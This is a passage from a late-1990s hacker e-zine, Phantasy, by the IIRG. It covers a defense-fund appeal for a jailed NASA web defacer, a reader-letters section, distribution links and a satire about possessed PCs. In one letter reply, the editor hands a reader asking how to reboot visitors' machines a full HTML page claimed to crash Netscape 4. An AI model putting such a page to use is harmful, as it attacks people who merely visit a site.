-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Section [9]: FREE the FISH
By: Mercenary <iirg@iirg.org>
with assistance from BoW
http://www.bow.org/trout/
.a@&$$$ .a@&$&@a. .a&$$$$ .a&$$$$ .a@&$$$ .a$$$a. .a@&$$$ a$$ $$a
$$$$$$$ $$$' `$$$ $$$$$$$ $$$$$$$ $$$$$$$ $$$$$$$ $$$$$$$ $$$ $$$
$$$ $$$. .a&$' $$$' $$$' $$$ `$$$$$' $$$$. $$$ $$$
$$$$$$ $$$$$$$' $$$$$a $$$$$a THE $$$$$$ .aaaaa. `$$$$a. $$$$$$$$
$$$ $$$ `$$a. $$$. $$$. $$$ $$$$$$$ `$$$$ $$$ $$$
$$$ $$$ `$$$a. $$$$$$$ $$$$$$$ $$$ $$$$$$$ $$$$$$$ $$$ $$$
$$$ $$$ `$$$' `$$$$$$ `$$$$$$ $$$ `$$$$$' "$$$$$" $$$ $$$
I guess that for 2600 Magazine to offer you any support, you must have to
have a book written about you or be a high profile media grabbing celebrity.
Yet when Jason Mewhiney (AKA - Tr0ut) defaced NASA's main page on March
5th 1997 and offered support to 2600 Magazine's two poster boys (Kevin Mitnick
and Ed Cummings - AKA Bernie S), wouldn't you think that Eric Corley (AKA -
Emmanuel Goldstein) might offer just a little support or media exposure to
Jason?
Well this support hasn't surfaced yet. Please read the following
information and offer Jason the support that 2600 Magazine hasn't.
-----------------------------------------------------------------------------
About Jason Mewhiney's Case
NASA V. JASON MEWHINEY
I. Proceedings to Date
Jason originally faced fifty one charges and a $70,000 fine for his alleged
involvement in the defacement of NASA's main page on March 5, 1997. This is
however simply the culmination of years of harassment that Jason has faced
from both the American and Canadian authorities.
A. Jason's current situation
Jason is currently serving a six-month prison sentence in Canada after
entering into a plea agreement that reduced his charges. In sentencing him,
Justice John Poupore said, "You sir, are a convicted criminal. That is a
distinction you will carry with you for the rest of your life. It is nothing
to be proud of." This is true -- there will be no badge of pride on Jason's
sleeve when he leaves prison. When he does, it will be as a convicted
computer-criminal, potentially facing similar restrictions to those faced
by Kevin Mitnick upon his release. Jason began his sentence in a medium -
maximum security prison in Sudbury, Ontario. Everyone in the prison was about
twice his age. Most of them hard-core criminals, including several convicted
murderers serving 2 back to back life sentences.
About 2 weeks ago he was transferred to a facility in Timmins, ON, which
according to Jason, is at least 10 times worse than the first prison. Jason
has been forced to endure countless hardships in the short time he has been
incarcerated. Despite the comparatively benign nature of his crimes, he is
placed in the same environment as murderers and rapists. He is only allowed 1
visit per week at 15 minutes per visit. His family has tried to bring him
reading material -- harmless magazines like People -- but the prison has
disallowed it.
In a recent incident, Jason went to brush his teeth after finishing his work
as a cleaner at the prison. He saw another inmate cleaner come out of one of
the bathrooms. Assuming the bathroom was free, he went in and
brushed his teeth. A guard then came and said the bathroom was for guards
only. He was written up for it, and given a reprimand for "misconduct".
Three days were tacked onto his sentence as a result. This incident will
likely jeopardize his parole -- which he may be up for soon -- but worst of
all, they threw him in the "hole". Which according to Jason himself, isn't a
bad enough description of the place. Solitary confinement in this prison
consists of an unlit 11 x 6 room with no mattress, bed, or window. Other
prisoners sneak drugs in by "sticking them in their ass and shitting onto
magazines to get them out." Even the notorious Canadian serial-killer Karla
Homolka is not forced to live in such a Dickensian environment.
Update: You can write to Jason Mewhiney in Prison.
Send any correspondence to:
Jason Mewhiney
Box 90
Monteith Ontario
P0K 1P0
CANADA
B. Sentencing
Jason was sentenced to six months in jail after pleading guilty to twelve of
the fifty one charges against him. After his prison sentence, it is likely
that he may serve time under "house arrest". While under house arrest,
Jason will effectively be banned from any and all computer use. This leaves
Jason without his one marketable skill and will create massive problems for
him when he is released. In addition to the prison-term and the possible
restrictions upon his release, Jason has also been ordered to pay a $6000
fine. Six thousand dollars is far short of the original seventy-thousand that
was being sought by NASA, yet it will still remain as a considerable
financial burden to someone who will be left effectively unemployable after
his release.
II. Analysis of the case
The original charges that Jason faced were completely blown out of all
proportions. NASA claimed that to copy the backup of their index page back
and reinstall and secure the machine cost them an estimated $70,000. Anyone
with any experience of computers and computer security can see that this is
a grossly inflated figure. You can read NASA's statement on the whole
incident at http://www.hq.nasa.gov/office/oig/hq/press/pr99025.txt
During the course of Jason's trial and conviction, thousands of dollars of
taxpayer money were wasted on frivolous and unnecessary actions sanctioned by
both the FBI and the RCMP. The RCMP agents and Canadian authorities involved
in the case were all flown down to NASA headquarters for what essentially
added up to a free tour. American authorities and NASA officials were
flown up to Canada on several occasions simply to attend the occasional short
bail-hearing or pre-trial motion. Everyone was flown up to Canada again for
the sentencing hearing, despite their presence not being required. Who ends
up paying for all of this air-travel and accommodation? The Canadian taxpayer,
in the end. Unfortunately, this never came to light during any of the
reporting on Jason's case. Even though Jason eventually plea bargained and
managed to avoid the huge fine and long jail term that he was threatened with,
we still have to ask ourselves whether someone should be imprisoned for what
was essentially no more than a prank. Can we continue to allow corporations
and government agencies to arbitrarily pick numbers out of the air when
accounting for "damages" that occurred as a result of a mere web-page
defacement?
The Trout Defense Fund
.a@&$$$ .a@&$&@a. .a&$$$$ .a&$$$$ .a@&$$$ .a$$$a. .a@&$$$ a$$ $$a
$$$$$$$ $$$' `$$$ $$$$$$$ $$$$$$$ $$$$$$$ $$$$$$$ $$$$$$$ $$$ $$$
$$$ $$$. .a&$' $$$' $$$' $$$ `$$$$$' $$$$. $$$ $$$
$$$$$$ $$$$$$$' $$$$$a $$$$$a THE $$$$$$ .aaaaa. `$$$$a. $$$$$$$$
$$$ $$$ `$$a. $$$. $$$. $$$ $$$$$$$ `$$$$ $$$ $$$
$$$ $$$ `$$$a. $$$$$$$ $$$$$$$ $$$ $$$$$$$ $$$$$$$ $$$ $$$
$$$ $$$ `$$$' `$$$$$$ `$$$$$$ $$$ `$$$$$' "$$$$$" $$$ $$$
Defense Fund
Jason Mewhiney has been financially ruined by the events surrounding his
trial and incarceration. Jason's mother is bearing the brunt of the burden,
facing thousands of dollars in Lawyer fees while Jason sits in prison. In
addition to the debt incurred by the trial, Jason will have to deal with the
six-thousand dollar fine he has been ordered to pay to NASA. Without any
means of income, and more than likely no chance of gainful employment, this
case is likely to haunt him financially for years to come.
A Defense fund has been set up to help ease the burden placed on Jason and
his family. If you care to donate, please send either a check or money order to:
The Trout Defense Fund
2527 Farmcrest Dr. #404
Herndon, VA 20171
USA
Any amount is greatly appreciated. We are currently working on setting up a
dedicated account for the fund so that money can be directly transferred. Any
moneys received will go directly to help cover Jason's legal bills. If you
can't afford to donate, then why not take the time to write Jason a letter or
send him some reading material? Anything sent to the defense fund will be
forwarded to either Jason or his mother directly.
Thank you for your support.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Section [10]: Letters to the IIRG
(Fan Mail, Hate Mail, Letter Bombs)
<iirg@iirg.org>
I receive so many letters and requests that it would be impossible to
post all letters received. However, every now and then I get one that
makes me laugh or vomit uncontrollably. I offer these to you.....
------------------------------------------------------------------------------
1. I have a question about Phantasy Magazine...
From: Pegasi17@aol.com
Delivered-To: iirg@iirg.org
Date: Sat, 10 Jul 1999 03:59:06 EDT
Subject: I have a question about Phantasy Magazine...
To: iirg@iirg.org
Is Phantasy Magazine going to be continued or was the issue 22 the last issue
that will be made? Thank you much...
---- Pegasi17
IIRG - Well the last issue was #23, and No... We are publishing again.
-------------------------------------------------------------------------------
2. Inquiry?
Delivered-To: iirg@iirg.org
Date: Sun, 25 Jul 1999 23:16:36 -0700
From: Erik Bos <Genevaroth@yahoo.com>
To: iirg@iirg.org
Subject: inquiry
I am looking for schematics for the following:
ELF generator microwave weapon
if in any back issues there is anything like this pls. email me with
ordering info.
Thank you
Erik Bos
IIRG - Sorry, but the technology to Microwave Elves has been patented
and kept strictly confidential by the Keebler Corporation.
Might I suggest you try a toaster oven instead?
-------------------------------------------------------------------------------
3. Are You for Hire?
From: "Marie Estes" <sophistry7@hotmail.com>
To: iirg@iirg.org
Date: Sun, 24 Oct 1999 21:23:43 GMT
I'm enjoying your prose on your website.
I, however, am not one of your kind. I admire your exploits and ambition.
I require your services and do not have the knowledge or expertise, nor
temporal resources to do the job myself. Perhaps you might consider an
innocuous mercenary act?
You ARE for hire, aren't you?
RSVP.
IIRG - What did you have in mind Marie? And does it involve chocolate
syrup and whip cream?
-------------------------------------------------------------------------------
4. Info?
From: "DK" <ww7@locl.net>
To: <iirg@iirg.org>
Subject: info
Date: Sat, 25 Dec 1999 17:57:34 -0500
Hi
I am looking for the code that will allow a webpage to reboot the
viewer computer. Do you have or know any info that will help me find this
coding?
syburcat
IIRG - Try putting this on your page to Crash Netscape 4
=============================
<html>
<head>
<title>Smash Netscape</title>
<body bgcolor="#000000" text="#ffffff">
<br>
<font face="Arial, Helvetica, Geneva">
<center>
<font size="5" color="#777777"><b>Smash Netscape</b></font><br>
<br>
This page will crash Netscape Communicator 4!
</center>
</font>
<div id="smashItDiv" style="position: absolute; left: 160px; top: 175px;
width: 264px; high: 150px; z-index: 50; visibility: visible;">
<table border="0" cellspacing="0" cellpadding="0" width="264">
<tr>
<td align="center" valign="middle">
<form name="smashItForm">
<img name="NSCrashImg" src="X.gif" border="0">
<br>
<font face="Arial, Helvetica" size="2">Crash Netscape</font><br>
<input name="askjdfh" type="input" size="20" maxlength="100"><br>
</font>
</form>
</td>
</tr>
</table>
</div>
<br>
</body>
</html>
==================================
-----------------------------------------------------------------------------
5. You Evil Hacker Survivalists You!!!
Date: Thu, 02 Mar 2000 22:36:13 -0600
From: Richard Reed <sanders4@knightsnet.com>
To: ticom@iirg.org
Hi yes I think this page is a threat to our country therefore I have
forwarded a copy of this page and a link to various government agencies.
http://www.iirg.org/~ticom/survival.html
TICOM - The only thing the Connecticut Survivalist Alliance Page is a
threat to are totalitarians, socialists, close-minded idiots, and
other such scum who despise the Bill of Rights. Since you are
apparently one of those types you have my permission to go frolic
in conjunction with yourself.
My guess is that you are a terrorist, child molester, rapist, or
serial killer who does not wish his potential victims armed with
knowledge that they may use to defend themselves and maintain their
self-reliance and determination.
If not, then you are simply an idiot.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Section [12]: Phantasy Distribution Site
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Phantasy Distribution Sites
Phantasy's Distribution Sites are continually changing; we apologize if you
visit a site and it's not there. But always go to our main site and it will
be there.
1. The IIRG's Main Phantasy Distro Site
http://www.iirg.org/phantasy.html
2. L0pht's Phantasy Magazine Archive
http://www.l0pht.com/%7Eoblivion/IIRG.html
3. EFF "Phantasy" Archive
http://www.eff.org/pub/Publications/CuD/Phantasy/index.html
If you'd like to set-up a Phantasy Distro site and be listed here and
on the IIRG's link page, e-mail Mercenary at iirg@iirg.org
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Section [13] Articles We Never Want to See
This Month - @MISTAKE PC Busters
Forget about those nasty viruses and malicious hackers; the real threat
to your PC is far more insidious. Your home computer may be host to a
demon from Hell. You and your family may well come under its malevolent
control.
"While the Computer Age has ushered in many advances, it has also opened yet
another door through which Lucifer and his minions can enter and corrupt
men's souls," says Reverend Jim Peasboro, author of the upcoming book,
The Devil in the Machine.
That's why the trained "White Hat Hackers" at the IIRG's
@MISTAKE Corporation are coming to your aid. The IIRG's world renowned
staff of trained demon killing Mercenaries will rid your PC of the nastiest
spawns of Satan.
Listen to these testimonials:
"My wife who had never expressed an impure thought in her life was entering
Internet chat rooms and found herself spewing foul, debasing language that
she would never use normally. The IIRG came in with battle axes and completely
destroyed her system. It was the best display of Information Warfare that
I have ever seen."
Winn Schwartau
"My programs began talking directly to me, openly mocking me.
It typed out, 'John, you are a liar and your book sucks.'
Then the printer went haywire and started printing out what looked like
gobbledygook. I later had a college professor examine the text.
He told me it was an ancient language and to contact the IIRG.
It finally turned out to be a stream of obscenities written in a
2,800-year-old Mesopotamian dialect! Thank god the IIRG knows how
to translate ancient Mesopotamian."
John Markoff
The Reverend advises anyone suspecting that their computer is possessed to
consult a clergyman, or, if that fails - contact the IIRG and the @MISTAKE
Corporation.
Their skilled Technicians can replace your hard drive and reinstall your
software, getting rid of the wicked spirit permanently and installing
numerous monitoring and backdoor programs on your system.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
PHANTASY(C) IIRG 1991 - 2000
May Odin Guide Your Way!
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
May You Be Feasting and Drinking in Valhalla For a Full Night
Before the Christian God Knows You're Dead
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-